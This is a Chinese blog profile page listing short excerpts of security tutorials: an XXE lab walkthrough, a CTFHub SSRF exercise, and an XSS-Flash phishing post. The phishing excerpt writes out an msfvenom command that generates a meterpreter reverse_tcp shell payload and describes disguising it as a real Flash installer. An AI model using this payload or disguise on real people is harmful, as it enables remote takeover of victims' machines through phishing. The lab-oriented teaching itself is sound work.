- 博客(4)
- 收藏
- 关注
原创 Apache2---XXE 靶机漏洞实战保姆级教程
思路:1.nmap,dirb扫描,进行一个信息收集。3.利用已知漏洞,注入xxe语句,查看关键文件信息。以下就是对Apache2靶机的一个xxe渗透过程。2.用burp工具抓包,查询可利用漏洞。4.简单的代码审计,最后获取flag。希望可以对大家有帮助。
2024-07-25 21:09:34 224
原创 CTFHub----WEB-SSRF全网最详细的保姆级教程!!!!!!
1.我们直接访问flag.php发现没有提交按钮,所以我们需要自己写一个按钮,前端的东西还是很容易修改 的, 把这个标签直接插入到下列html中去。2.在这里我们用的是第一个 file:///,去访问本地计算机中的文件,访问成功后看见有三个问号。file:///-------- 本地文件传输协议,主要用于访问本地计算机中的文件。3.,我们可以使用localhost来代替,也是本机的意思.成功获得flag。
2024-07-24 22:18:51 770
原创 XSS-Flash攻击钓⻥
进⼀步对提供下载的Flash⽂件进⾏伪装,在真的Flash官⽹下载安装程序并在kali使⽤msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > shell.exe。点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏",配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。
2024-07-23 22:58:33 240
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人